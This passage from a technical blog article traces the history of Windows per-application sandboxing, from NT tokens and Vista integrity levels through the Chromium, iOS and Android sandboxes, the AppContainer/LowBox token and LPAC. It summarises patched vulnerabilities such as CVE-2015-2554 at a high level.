&lt;p&gt;The question that opens this article is the same one Windows NT 3.1 could not ask in July 1993: &lt;em&gt;two processes, same user, same DACLs, how does the kernel give them different verdicts?&lt;/em&gt; For nineteen years it could not. The answer Microsoft shipped on October 26, 2012 is the &lt;em&gt;LowBox token&lt;/em&gt;, and we will trace one coherent primitive from its Vista-era ancestors through the four production deployments that exercise it on every Windows 11 machine in 2026. We will end with the exploit history that shaped its current hardening. The story starts on January 30, 2007, with a single browser, a single bit, and a structural defect Microsoft spent the next fourteen years repairing.&lt;/p&gt;
&lt;h2&gt;2. The Internet Explorer 7 Protected Mode Era&lt;/h2&gt;
&lt;p&gt;By the time Windows Vista went generally available on January 30, 2007 [@wiki-vista], a large majority of home Windows installs ran day-to-day under administrator accounts. The Wikipedia summary of &lt;a href=&quot;https://paragmali.com/blog/adminless-how-windows-finally-made-elevation-a-security-boun/&quot; rel=&quot;noopener&quot;&gt;User Account Control&lt;/a&gt; captures the pre-Vista status quo plainly: in Windows 1.0 through Windows 9x, &quot;all applications had privileges equivalent to the operating system&quot; [@wiki-uac]. One browser exploit equalled total compromise of the user profile, and Internet Explorer 6 from 2001 was the single largest pathway between hostile content and the desktop.&lt;/p&gt;
&lt;p&gt;Vista&apos;s response had two halves. The first was User Account Control, the split-token model that asks the user to consent before promoting a Medium-integrity process to High. The second was Mandatory Integrity Control (MIC), the labelling primitive UAC depended on. MIC defined four integrity levels with their own SIDs: Low (&lt;code&gt;S-1-16-4096&lt;/code&gt;), Medium (&lt;code&gt;S-1-16-8192&lt;/code&gt;), High (&lt;code&gt;S-1-16-12288&lt;/code&gt;), and System (&lt;code&gt;S-1-16-16384&lt;/code&gt;) [@wiki-mic]. The Security Reference Monitor checks the label before the DACL; a label deny short-circuits the access check.&lt;/p&gt;

A Windows Vista security mechanism that adds an *integrity level* to every process and every securable object [@ms-learn-mic]. Levels are System, High, Medium, and Low; objects carry a `SYSTEM_MANDATORY_LABEL_ACE` in their SACL declaring a minimum integrity level for access. By default the system creates every object with an access mask of `SYSTEM_MANDATORY_LABEL_NO_WRITE_UP`, which prevents lower-IL writers from modifying higher-IL objects but does not block reads.
&lt;p&gt;The four MIC integrity-level SIDs are spaced at 0x1000-unit increments, the consecutive &lt;code&gt;SECURITY_MANDATORY_*_RID&lt;/code&gt; constants in &lt;code&gt;winnt.h&lt;/code&gt;: Low &lt;code&gt;S-1-16-4096&lt;/code&gt; (0x1000), Medium &lt;code&gt;S-1-16-8192&lt;/code&gt; (0x2000), High &lt;code&gt;S-1-16-12288&lt;/code&gt; (0x3000), System &lt;code&gt;S-1-16-16384&lt;/code&gt; (0x4000) [@wiki-mic]. They are in identifier authority 16, the &lt;em&gt;Mandatory Label Authority&lt;/em&gt;.&lt;/p&gt;
&lt;p&gt;Internet Explorer 7, which had shipped on October 18, 2006 [@wiki-ie7], became MIC&apos;s first marquee consumer. IE 7&apos;s &lt;em&gt;Protected Mode&lt;/em&gt; launched the renderer at Low integrity, where it could not write to &lt;code&gt;%USERPROFILE%&lt;/code&gt; (Medium IL by default) or to &lt;code&gt;HKLM&lt;/code&gt;. A separate Medium-IL broker process named &lt;code&gt;ieuser.exe&lt;/code&gt; accepted COM requests from the renderer and performed privileged work on its behalf -- saving downloads, writing to non-Low locations -- only for operations the policy allowed. The renderer&apos;s private workspace lived at &lt;code&gt;%USERPROFILE%\AppData\LocalLow\&lt;/code&gt; and the corresponding Low-IL temporary internet files [@ie7-protected-mode-mirror]. Marc Silbey and Peter Brundrett documented the design on MSDN. The MSDN article is preserved at a third-party mirror today; the original Microsoft path retired with the IE developer area.&lt;/p&gt;
&lt;p&gt;The structural pattern was complete. A sandboxed worker process and a higher-privilege broker that re-elevates only the operations the policy permits is the topology of every later Windows-side capability sandbox.The same broker / target pattern reappears under several names: &lt;code&gt;RuntimeBroker.exe&lt;/code&gt; for UWP, &lt;code&gt;AppInfo&lt;/code&gt; for UAC consent prompts, &lt;code&gt;PrintWorkflowUserSvc&lt;/code&gt; for print, and the WebAuthn and voice-activation brokers for those WinRT capabilities. Each is structurally &lt;code&gt;ieuser.exe&lt;/code&gt; for a different resource. AppContainer&apos;s &lt;code&gt;RuntimeBroker.exe&lt;/code&gt; is structurally the same idea as &lt;code&gt;ieuser.exe&lt;/code&gt;. AppInfo (the UAC consent broker), the Print broker, the WebAuthn broker, and the voice-activation broker all share the lineage. Chromium&apos;s own broker / target sandbox, which we will meet in §3, was published less than two years later on the same conceptual base.&lt;/p&gt;

flowchart LR
    A[iexplore.exe&lt;br /&gt;Low IL renderer] --&amp;gt;|&quot;COM request&quot;| B[ieuser.exe&lt;br /&gt;Medium IL broker]
    A --&amp;gt;|&quot;file write&quot;| C[&quot;%USERPROFILE%/AppData/LocalLow/&lt;br /&gt;Low-IL workspace&quot;]
    B --&amp;gt;|&quot;write download&quot;| D[&quot;%USERPROFILE%/Downloads/&lt;br /&gt;Medium IL&quot;]
    B -.-&amp;gt;|&quot;policy decides&quot;| A
&lt;p&gt;So far so good. But Protected Mode had three structural defects, and each one mapped one-to-one to a specific Windows 8 fix five years later.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Defect one: read-up was not blocked by default.&lt;/strong&gt; The default mandatory-label ACE was &lt;code&gt;SYSTEM_MANDATORY_LABEL_NO_WRITE_UP&lt;/code&gt;. A Low-IL process could not write to Medium-IL objects, but it could read them. The Microsoft Learn page on MIC is explicit: &quot;the system creates every object with an access mask of &lt;strong&gt;SYSTEM_MANDATORY_LABEL_NO_WRITE_UP&lt;/strong&gt;&quot; [@ms-learn-mic]. Unless the object explicitly carried a &lt;code&gt;NO_READ_UP&lt;/code&gt; mandatory ACE -- which &lt;code&gt;%USERPROFILE%\.ssh\id_ed25519&lt;/code&gt; did not -- a compromised Low-IL IE could &lt;em&gt;read&lt;/em&gt; the user&apos;s SSH keys, browser passwords, OAuth refresh tokens, and any other Medium-IL secret. The Chromium sandbox FAQ flags the same observation: Vista&apos;s integrity levels were the only user-mode separation primitive available, and Chromium built a layered user-mode sandbox on top precisely because Vista&apos;s separation was insufficient [@chromium-sandbox-faq].&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Note:&lt;/strong&gt; A &lt;code&gt;NO_WRITE_UP&lt;/code&gt; boundary is an &lt;em&gt;integrity&lt;/em&gt; boundary, not a &lt;em&gt;confidentiality&lt;/em&gt; boundary. It stops a low-trust process from corrupting your data, but it does not stop it from reading your data. For a browser renderer that processes hostile content, confidentiality is the load-bearing axis: the attacker&apos;s goal is exfiltration, not corruption. Without &lt;code&gt;NO_READ_UP&lt;/code&gt;, MIC alone could not contain a renderer compromise [@ms-learn-mic].&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;&lt;strong&gt;Defect two: identity was shared across instances.&lt;/strong&gt; Two Low-IL IE renderers ran with the same Low-IL SID and the same user SID. They could open handles to each other&apos;s named objects, shared memory sections, and process tokens. Integrity level is an axis; it is not a per-instance principal.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Defect three: network access was unconstrained.&lt;/strong&gt; A Low-IL process could open any socket to any host. The Vista firewall was the freshly-introduced Windows Filtering Platform, but WFP had no notion of &quot;which app is this&quot; at all. As James Forshaw later put it on the Project Zero blog, &quot;Prior to XP SP2 Windows didn&apos;t have a built-in firewall... While XP SP2 introduced the built-in firewall, the basis for the one used in modern versions of Windows was introduced in Vista as the Windows Filtering Platform (WFP)&quot; [@p0-network]. WFP&apos;s per-application-package callout came years later, and the corresponding condition value &lt;code&gt;FWPM_CONDITION_ALE_PACKAGE_ID&lt;/code&gt; did not exist in 2007.&lt;/p&gt;
&lt;p&gt;Each defect became a specific Windows 8 mechanism. Defect one became the per-package namespace redirect plus the LowBox flag&apos;s &lt;code&gt;NO_READ_UP&lt;/code&gt;-by-construction effect on cross-package reads. Defect two became the AppContainerNumber per-instance key. Defect three became the WFP capability gate. Microsoft and Google looked at the same Vista primitives and reached opposite conclusions. Google built a user-mode sandbox on top of NT. Microsoft built a per-app principal &lt;em&gt;inside&lt;/em&gt; the NT token. The next two sections walk both branches.&lt;/p&gt;
&lt;h2&gt;3. Same Idea, Four Directions&lt;/h2&gt;
&lt;p&gt;Between January 2007 and October 2012, four different teams reached the same conclusion from four different starting points: &lt;em&gt;the kernel needs a per-application principal, not just a per-user one&lt;/em&gt;. They built it in four different places.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Chromium sandbox, December 2008.&lt;/strong&gt; When Chrome 1.0 shipped on Windows in December 2008, it carried a layered user-mode sandbox: a broker process plus a target process, a restricted token derived from the user&apos;s token, a job object that limited the target&apos;s syscall surface, and (on Vista and later) the Low integrity level on the target. The Chromium sandbox design document spells out the rule that defined the choice. &quot;Do not re-invent the wheel: It is tempting to extend the OS kernel with a better security model. Don&apos;t. Let the operating system apply its security to the objects it controls&quot; [@chromium-sandbox]. The reasoning continues in the FAQ. &quot;the sandbox cannot provide any protection against bugs in system components such as the kernel it is running on&quot; [@chromium-sandbox-faq]. The Chromium design was a &lt;em&gt;user-mode-only&lt;/em&gt; sandbox, layered on top of NT primitives that already existed.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Google Native Client, 2009.&lt;/strong&gt; Bennet Yee and co-authors at Google published &lt;em&gt;Native Client: A Sandbox for Portable, Untrusted x86 Native Code&lt;/em&gt; at IEEE S&amp;amp;P 2009 [@nacl-ieee]. NaCl declared its capabilities at launch and structurally inverted the question: rather than retrofit a sandbox onto an application, run untrusted code only with capabilities the host has explicitly granted. The Wikipedia retrospective records NaCl&apos;s eventual replacement by WebAssembly [@wiki-nacl], but the design idea -- &lt;em&gt;capability-declared-at-launch&lt;/em&gt; -- prefigured what Microsoft would call &lt;code&gt;SECURITY_CAPABILITIES.Capabilities[]&lt;/code&gt; three years later.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Apple iOS application sandbox, 2007 onward.&lt;/strong&gt; iPhone OS 1.0 (June 29, 2007) shipped with a kernel-side TrustedBSD-derived MAC sandbox that confined Apple&apos;s own built-in apps [@apple-platform-security-app]. The developer-facing surface -- third-party apps, Bundle IDs, Team IDs, and the entitlements dictionary -- arrived with iPhone OS 2.0 in July 2008 alongside the public App Store [@apple-platform-security-app]. From 2008 onward the per-app principal had two halves: a &lt;em&gt;Bundle ID&lt;/em&gt; (a string the developer picks, structurally like a Windows Package Family Name) and a &lt;em&gt;Team ID&lt;/em&gt; (the signer). Each app&apos;s profile lived at &lt;code&gt;Containers/Data/Application/&amp;lt;bundle-uuid&amp;gt;/&lt;/code&gt;, structurally similar to Windows&apos;s later &lt;code&gt;%LOCALAPPDATA%\Packages\&amp;lt;PFN&amp;gt;\&lt;/code&gt;. The capability set was an *entitlements dictionary* signed into the app bundle, structurally similar to Windows&apos;s later &lt;code&gt;&amp;lt;Capabilities&amp;gt;&lt;/code&gt; element.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Android per-app UID, September 23, 2008.&lt;/strong&gt; When Android 1.0 shipped on the T-Mobile G1 on September 23, 2008 [@wiki-android], it carried the most parsimonious solution: each app got its own UNIX UID. Classical Unix discretionary access control did the rest. Where Windows extended the SID alphabet, Android extended the UID allocation policy. The Android Application Sandbox page records the additional MAC layers Android added in later releases -- SELinux from Android 5.0 onward, seccomp-bpf from Android 8.0 onward, and per-physical-user partitions [@android-app-sandbox]. The kernel principal stayed a Unix UID.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Crispin Cowan, Jan 17, 2008.&lt;/strong&gt; Between the Vista release and the eventual Windows 8 ship, the &lt;em&gt;person&lt;/em&gt; who would write Microsoft&apos;s answer arrived on the security team. Crispin Cowan, the StackGuard co-author whose 1998 USENIX paper coined the term &lt;em&gt;stack canary&lt;/em&gt; [@stackguard], joined the Microsoft Windows security team in January 2008. ZDNet&apos;s coverage of the hire reads: &quot;Crispin Cowan, the Linux security expert behind StackGard [sic], the Immunix Linux distro and AppArmor, has joined the Windows security team... Crispin will join the team that worked on User Account Control&quot; [@zdnet-cowan]. Cowan&apos;s later USENIX Security 2013 keynote &lt;em&gt;Windows 8 Security: Supporting User Confidence&lt;/em&gt; credits him with the AppContainer design [@cowan-usenix13], and his University of Waterloo speaker page makes the attribution explicit: &quot;From 2008 to 2017, Dr. Cowan was with Microsoft, where he designed the App Container sandbox that is used by the Edge and Chrome web browsers, Microsoft Office, and Windows 10 to contain Universal Windows Apps&quot; [@crysp-cowan].&lt;/p&gt;
&lt;p&gt;The four mechanisms compare like this:&lt;/p&gt;
&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Year&lt;/th&gt;
&lt;th&gt;Operating system&lt;/th&gt;
&lt;th&gt;Principal name&lt;/th&gt;
&lt;th&gt;How it is named&lt;/th&gt;
&lt;th&gt;How it is enforced&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;&lt;tr&gt;
&lt;td&gt;2007&lt;/td&gt;
&lt;td&gt;iOS&lt;/td&gt;
&lt;td&gt;Bundle ID + Team ID (from 2008)&lt;/td&gt;
&lt;td&gt;Developer string + signer&lt;/td&gt;
&lt;td&gt;Mandatory per-app MAC + entitlements&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;2008&lt;/td&gt;
&lt;td&gt;Chromium on Windows&lt;/td&gt;
&lt;td&gt;(none, user UID only)&lt;/td&gt;
&lt;td&gt;User SID + restricted token&lt;/td&gt;
&lt;td&gt;User-mode broker + job object + IL&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;2008&lt;/td&gt;
&lt;td&gt;Android&lt;/td&gt;
&lt;td&gt;Per-app UNIX UID&lt;/td&gt;
&lt;td&gt;UID allocated at install&lt;/td&gt;
&lt;td&gt;Classical Unix DAC + SELinux + seccomp&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;2012&lt;/td&gt;
&lt;td&gt;Windows 8&lt;/td&gt;
&lt;td&gt;Package SID + Capability SIDs&lt;/td&gt;
&lt;td&gt;Deterministic SHA-2 of moniker&lt;/td&gt;
&lt;td&gt;Kernel access token + WFP + Object Manager&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;&lt;/table&gt;

Each design carries the same *intent* -- give the kernel a per-application principal -- and locates it differently. iOS keeps the per-app *policy data* (entitlements plus `.sb` profiles) in the code-signed bundle and enforces it mandatorily in the kernel via the TrustedBSD-derived `Sandbox.kext`, with no opt-out. Android puts the principal in the UID space the Unix kernel already understood, so existing DAC plumbing did the work. Chromium kept the principal *outside* the kernel entirely, layering a user-mode policy on top of the existing user-keyed access check. Microsoft did the structurally rarest thing: it extended the kernel&apos;s access token data structure. The other three retrofitted the principal on top of an existing access-check pipeline; Windows extended the pipeline itself. The next section walks why Microsoft picked option four.
&lt;p&gt;The name &lt;em&gt;LowBox&lt;/em&gt; is itself a vestige of Microsoft&apos;s internal marketing process. The Win32 surface chose &lt;em&gt;AppContainer&lt;/em&gt; in time for Windows 8&apos;s general availability; the kernel surface had already shipped under the older name. Microsoft Learn confirms the lineage in plain prose [@ms-learn-legacy], and the syscall &lt;code&gt;NtCreateLowBoxToken&lt;/code&gt; preserves it.&lt;/p&gt;
&lt;p&gt;Microsoft had a choice: build a user-mode policy daemon like Apple, extend the user-keyed principal like Android, or keep everything in user mode like Chromium. The team chose the fourth option and extended the kernel access token. The next section walks how, year by year, that decision matured.&lt;/p&gt;
&lt;h2&gt;4. The Evolution, Generation by Generation&lt;/h2&gt;
&lt;p&gt;The Windows 8 ship on October 26, 2012 [@wiki-win8] [@win8-rtm] was not the end of the story. It was the start of a six-generation refinement that continues into 2026 Windows 11 25H2. The seven generations look like this on a timeline.&lt;/p&gt;

gantt
    title Per-application sandbox primitives in Windows
    dateFormat YYYY-MM
    axisFormat %Y
    section Gen 0
    Classic NT user-token model :done, g0, 1993-07, 33y
    section Gen 1
    MIC plus IE 7 Protected Mode :done, g1, 2007-01, 19y
    section Gen 2
    Chromium broker target sandbox :done, g2, 2008-12, 18y
    section Gen 3
    AppContainer LowBox token :done, g3, 2012-10, 14y
    section Gen 4
    Less Privileged AppContainer :done, g4, 2016-08, 10y
    section Gen 5
    MSIX TrustLevel appContainer :done, g5, 2018-11, 8y
    section Gen 6
    Windows Sandbox plus Hyper-V :done, g6, 2019-05, 7y
&lt;h3&gt;4.1 Generation 0: The classic NT user-token model (1993)&lt;/h3&gt;
&lt;p&gt;Dave Cutler&apos;s Windows NT 3.1 shipped in July 1993 with a security model that is still the foundation in 2026. Every process has an access token. The token carries &lt;code&gt;User&lt;/code&gt;, &lt;code&gt;Groups[]&lt;/code&gt;, &lt;code&gt;Privileges[]&lt;/code&gt;, and a &lt;code&gt;DefaultDacl&lt;/code&gt;. Every securable object has a security descriptor with a DACL. &lt;a href=&quot;https://paragmali.com/blog/windows-access-control-25-years-of-attacks/&quot; rel=&quot;noopener&quot;&gt;&lt;code&gt;SeAccessCheck&lt;/code&gt;&lt;/a&gt; walks the DACL access control entry by access control entry against the caller&apos;s user and group SIDs. &lt;em&gt;Identity equals authority:&lt;/em&gt; if process A and process B both run as Alice, they are the same principal to the kernel. Whatever Alice can do, both of them can do. Chapter 7 of the seventh-edition &lt;em&gt;Windows Internals&lt;/em&gt; [@ms-press-wi7] gives the canonical post-LowBox reference for this data structure.&lt;/p&gt;
&lt;p&gt;This model has no answer to the single-user, multi-application threat. A user&apos;s text editor and a user&apos;s browser are indistinguishable principals. &lt;em&gt;Bridge: the next generation tried to fix that by adding an axis, not a principal.&lt;/em&gt;&lt;/p&gt;
&lt;h3&gt;4.2 Generation 1: IE 7 Protected Mode plus MIC (Vista, 2007)&lt;/h3&gt;
&lt;p&gt;We already walked the mechanism in §2. Mandatory Integrity Control shipped with Vista&apos;s general availability on January 30, 2007 [@wiki-vista] [@wiki-mic]. Internet Explorer 7&apos;s Protected Mode launched its renderer at Low integrity with a Medium-IL &lt;code&gt;ieuser.exe&lt;/code&gt; broker [@wiki-uac] [@ie7-protected-mode-mirror]. The Wikipedia article on MIC names IE 7 as the marquee consumer: &quot;Internet Explorer 7 introduces a MIC-based &apos;Protected Mode&apos; setting&quot; [@wiki-mic]. &lt;em&gt;Bridge: integrity level is an axis, not a principal. Two Low-IL processes share identity.&lt;/em&gt;&lt;/p&gt;
&lt;h3&gt;4.3 Generation 2: The Chromium broker / target sandbox (Chrome, 2008)&lt;/h3&gt;
&lt;p&gt;The parallel path Microsoft did not take. Chromium&apos;s design document calls the architecture explicitly: &quot;The Windows sandbox is a user-mode only sandbox&quot; [@chromium-sandbox]. The two-process structure is named: &quot;The minimal sandbox configuration has two processes: one that is a privileged controller known as the &lt;em&gt;broker&lt;/em&gt;, and one or more sandboxed processes known as the &lt;em&gt;target&lt;/em&gt;&quot; [@chromium-sandbox]. The FAQ adds the integrity-level note: the sandbox &quot;uses integrity levels&quot; on Vista and later, and the only Vista-era application the FAQ knows about that used them was Internet Explorer 7 [@chromium-sandbox-faq]. &lt;em&gt;Bridge: who is this app? remains unanswered in any user-mode-only design.&lt;/em&gt;&lt;/p&gt;

Do not re-invent the wheel: It is tempting to extend the OS kernel with a better security model. Don&apos;t. Let the operating system apply its security to the objects it controls. -- Chromium sandbox design document [@chromium-sandbox]
&lt;p&gt;The pull quote is the most interesting sentence in the article so far, because Microsoft -- which &lt;em&gt;was&lt;/em&gt; the operating system vendor -- did exactly the opposite four years later, and shipped AppContainer the same year (2012) Chrome 22 hit the desktop with its user-mode-only sandbox. The two browsers&apos; modern descendants now run &lt;em&gt;both&lt;/em&gt; designs simultaneously, but we are getting ahead of ourselves.&lt;/p&gt;
&lt;h3&gt;4.4 Generation 3: AppContainer / LowBox token (Windows 8, October 26, 2012)&lt;/h3&gt;
&lt;p&gt;This is the keystone. Microsoft made three structural extensions to the NT access-token model.&lt;/p&gt;
&lt;p&gt;First, two new SID alphabets. The &lt;em&gt;App Package Authority&lt;/em&gt; (identifier authority 15) carries Package SIDs at &lt;code&gt;S-1-15-2-*&lt;/code&gt; and Capability SIDs at &lt;code&gt;S-1-15-3-*&lt;/code&gt; [@ms-learn-well-known-sids]. A Package SID is a deterministic SHA-2-derived identifier for a specific package; a Capability SID names a permission the package declared in its manifest. Microsoft&apos;s &lt;code&gt;DeriveAppContainerSidFromAppContainerName&lt;/code&gt; API takes a moniker string and returns the corresponding Package SID [@ms-learn-derivesid], which means every Windows 11 machine derives the same &lt;code&gt;S-1-15-2-*&lt;/code&gt; for &lt;code&gt;Microsoft.WindowsCalculator_8wekyb3d8bbwe&lt;/code&gt;.&lt;/p&gt;
&lt;p&gt;Second, a per-package partition of the Object Manager namespace. Every LowBox process&apos;s references to global named objects under &lt;code&gt;\BaseNamedObjects&lt;/code&gt; are rewritten by the Object Manager to land in &lt;code&gt;\Sessions\&amp;lt;n&amp;gt;\AppContainerNamedObjects\&amp;lt;package-sid&amp;gt;\&lt;/code&gt; and its &lt;code&gt;RPC Control&lt;/code&gt; sub-directory. The kernel captures handles to these directories at token-creation time and uses them at name-lookup time; the rewrite is invisible to the application code. We will name the exact field that holds the handles in §5.&lt;/p&gt;
&lt;p&gt;Third, an always-Low integrity level. Microsoft Learn states the rule plainly: &quot;if you &lt;em&gt;are&lt;/em&gt; in an app container, then the integrity level (IL) is always &lt;em&gt;low&lt;/em&gt;&quot; [@ms-learn-legacy]. The AppContainer flag is orthogonal to integrity level, but AppContainer membership forces the integrity level to Low. Two co-tenanted AppContainer processes can therefore both write to &lt;code&gt;\Sessions\&amp;lt;n&amp;gt;\AppContainerNamedObjects\&amp;lt;package-sid&amp;gt;\&lt;/code&gt; (their per-package directory is owned by the package SID) but neither can write to a Medium-IL object outside.&lt;/p&gt;
&lt;p&gt;The kernel surface is &lt;code&gt;NtCreateLowBoxToken&lt;/code&gt; [@ms-learn-ntcreatelowboxtoken]. Its nine-parameter signature -- the existing token, the desired access, an &lt;code&gt;OBJECT_ATTRIBUTES&lt;/code&gt; parameter, the package SID, a capability count and array, a handle count and array -- is the literal data plane for everything we just described. The Win32 surface is &lt;code&gt;CreateAppContainerProfile&lt;/code&gt; [@ms-learn-createprofile], &lt;code&gt;DeriveAppContainerSidFromAppContainerName&lt;/code&gt; [@ms-learn-derivesid], the &lt;code&gt;SECURITY_CAPABILITIES&lt;/code&gt; struct [@ms-learn-security-capabilities], and the &lt;code&gt;PROC_THREAD_ATTRIBUTE_SECURITY_CAPABILITIES&lt;/code&gt; attribute key that &lt;code&gt;UpdateProcThreadAttribute&lt;/code&gt; accepts [@ms-learn-updateprocthread]. All five APIs share the same minimum supported client: Windows 8 desktop applications [@ms-learn-ntcreatelowboxtoken] [@ms-learn-createprofile] [@ms-learn-security-capabilities].&lt;/p&gt;
&lt;p&gt;The corresponding access-check rule is also explicit. Microsoft Learn formalises the dual-principal intersection: &quot;the permitted access is the intersection of that granted by the user/group SIDs and AppContainer SIDs&quot; [@ms-learn-implementing]. We will walk this five-step check field by field in §5.&lt;/p&gt;

sequenceDiagram
    participant App as Launcher (Medium IL)
    participant W32 as Win32 surface
    participant K as Kernel
    App-&amp;gt;&amp;gt;W32: CreateAppContainerProfile(name, caps)
    W32--&amp;gt;&amp;gt;App: package SID, profile root
    App-&amp;gt;&amp;gt;W32: InitializeProcThreadAttributeList
    App-&amp;gt;&amp;gt;W32: UpdateProcThreadAttribute (PROC_THREAD_ATTRIBUTE_SECURITY_CAPABILITIES)
    App-&amp;gt;&amp;gt;W32: CreateProcess(STARTUPINFOEX)
    W32-&amp;gt;&amp;gt;K: NtCreateLowBoxToken(parent, caps, handles)
    K--&amp;gt;&amp;gt;K: set _TOKEN.Flags.LowBoxToken, stamp PackageSid, Capabilities, assign AppContainerNumber
    K--&amp;gt;&amp;gt;W32: new token handle
    W32--&amp;gt;&amp;gt;App: PROCESS_INFORMATION
    Note over K: Every later SeAccessCheck consults the new flag and fields.
&lt;p&gt;Three motivations drive the next three generations. The &lt;code&gt;ALL_APP_PACKAGES&lt;/code&gt; group SID grants every AppContainer ambient access to a broad default-installed surface; tighter deny-by-default needs the LPAC variant. Win32 applications cannot opt in without source changes; MSIX brings them in via manifest. Kernel exploits bypass the boundary entirely; Windows Sandbox wraps the boundary in Hyper-V.&lt;/p&gt;
&lt;p&gt;The implementation correctness motivations are equally specific. James Forshaw&apos;s &lt;em&gt;Raising the Dead&lt;/em&gt; post on Project Zero in January 2016 walked an issue (P0 Issue 483) in the original &lt;code&gt;NtCreateLowBoxToken&lt;/code&gt; plumbing that, in his own words, looked &quot;on the surface&quot; like at best a local denial of service but turned out to be an elevation of privilege [@p0-raising-dead]. &quot;The root cause of the vulnerability is the NtCreateLowBoxToken system call introduced in Windows 8 to support the creation of locked down tokens for Immersive Applications (formerly known as Metro) as well as IE11&apos;s Enhanced Protected Mode&quot; [@p0-raising-dead]. Microsoft patched the issue in bulletin MS15-111 on October 13, 2015. NVD records the specific CVE within MS15-111 that mapped to Forshaw&apos;s writeup as CVE-2015-2554, &quot;Windows Object Reference Elevation of Privilege Vulnerability&quot; [@nvd-cve-2015-2554]. Three years later, Forshaw&apos;s &lt;em&gt;Windows Exploitation Tricks: Exploiting Arbitrary Object Directory Creation&lt;/em&gt; post (P0 Issue 1550, August 2018) found a related bug in the AppInfo service&apos;s helper API: &quot;The AppInfo service, which is responsible for creating the new application, calls the undocumented API CreateAppContainerToken to do some internal housekeeping. Unfortunately this API creates object directories under the user&apos;s AppContainerNamedObjects object directory to support redirecting BaseNamedObjects and RPC endpoints by the OS&quot; [@p0-1550]. The directory was created &quot;with an explicit security descriptor which allows the user full access&quot; [@p0-1550], and a user-controlled symbolic link in the target could redirect the directory creation almost anywhere in the namespace.&lt;/p&gt;

Forshaw&apos;s two P0 writeups in 2016 and 2018 are textbook cases of *correct primitive, incorrect implementation*. The LowBox flag, the package SID, and the namespace partition are sound. The bugs were in adjacent code -- the kernel&apos;s reference-counting on handles passed to `NtCreateLowBoxToken` (Issue 483, fixed in MS15-111 as CVE-2015-2554 [@nvd-cve-2015-2554]) and the AppInfo service&apos;s overly permissive directory creation under `\AppContainerNamedObjects` (Issue 1550 [@p0-1550]). The lesson is that being *in the kernel* is not the same as being *correct in the kernel*. Forshaw&apos;s parallel work on the Diagnostics Hub Standard Collector Service -- &quot;we&apos;ll call it DiagHub for short&quot; [@p0-arbitrary-write-2018] -- belongs to the same class: brokers and helpers near the AppContainer boundary have repeatedly been the exploitable seams.
&lt;p&gt;&lt;em&gt;Bridge: ambient access via &lt;code&gt;ALL_APP_PACKAGES&lt;/code&gt; motivates the next generation.&lt;/em&gt;&lt;/p&gt;
&lt;h3&gt;4.5 Generation 4: Less Privileged AppContainer (LPAC) (Windows 10 1607, August 2, 2016)&lt;/h3&gt;
&lt;p&gt;LPAC is one of the most parsimonious changes in the AppContainer chain. Microsoft introduced a synthetic capability with the SID prefix &lt;code&gt;WIN://NOALLAPPPKG&lt;/code&gt;; when this capability is present in the new token&apos;s &lt;code&gt;Capabilities[]&lt;/code&gt; array, the kernel omits the &lt;code&gt;ALL_APP_PACKAGES&lt;/code&gt; group SID from the new token. The Windows 10 1607 Anniversary Update was where the mechanism shipped [@wiki-win10-versions]. Microsoft Learn defines LPAC plainly: &quot;Less Privileged AppContainers (LPAC) are even more isolated than regular AppContainers and require further capabilities to gain access to resources that regular AppContainers already have access to such as the registry, files, and others. For example, LPAC cannot open any keys in the registry unless it has the &lt;em&gt;registryRead&lt;/em&gt; capability and cannot use COM unless it has the &lt;em&gt;lpacCom&lt;/em&gt; capability&quot; [@ms-learn-implementing].&lt;/p&gt;
&lt;p&gt;The Chromium repository carries the most explicit user of this surface today. &lt;code&gt;sandbox/policy/win/lpac_capability.h&lt;/code&gt; enumerates the LPAC capability constants Chromium passes to its renderer / utility / network-service / GPU process tokens: &lt;code&gt;kLpacChromeInstallFiles&lt;/code&gt;, &lt;code&gt;kLpacAppExperience&lt;/code&gt;, &lt;code&gt;kLpacCom&lt;/code&gt;, &lt;code&gt;kLpacCryptoServices&lt;/code&gt;, &lt;code&gt;kLpacEnterprisePolicyChangeNotifications&lt;/code&gt;, &lt;code&gt;kLpacIdentityServices&lt;/code&gt;, &lt;code&gt;kLpacInstrumentation&lt;/code&gt;, &lt;code&gt;kLpacMedia&lt;/code&gt;, &lt;code&gt;kLpacPnPNotifications&lt;/code&gt;, &lt;code&gt;kLpacPnpNotifications&lt;/code&gt;, &lt;code&gt;kLpacServicesManagement&lt;/code&gt;, &lt;code&gt;kLpacSessionManagement&lt;/code&gt;, &lt;code&gt;kRegistryRead&lt;/code&gt;, and several Media Foundation-specific constants [@chromium-lpac]. Microsoft Edge, the Chromium-based rebase Microsoft published on January 15, 2020 [@edge-chromium-ga], inherited all of them. The policy &lt;code&gt;RendererAppContainerEnabled&lt;/code&gt; documents the Edge consumer specifically: &quot;Launches Renderer processes into an App Container for more security benefits... If you enable this policy, Microsoft Edge launches the renderer process in an app container&quot;, available on Windows ≥ 96 [@ms-learn-edge-lpac].&lt;/p&gt;
&lt;p&gt;&lt;em&gt;Bridge: LPAC is still a user-mode boundary. A kernel exploit still bypasses it.&lt;/em&gt;&lt;/p&gt;
&lt;h3&gt;4.6 Generation 5: MSIX TrustLevel = appContainer (Windows 10 1809, November 13, 2018)&lt;/h3&gt;
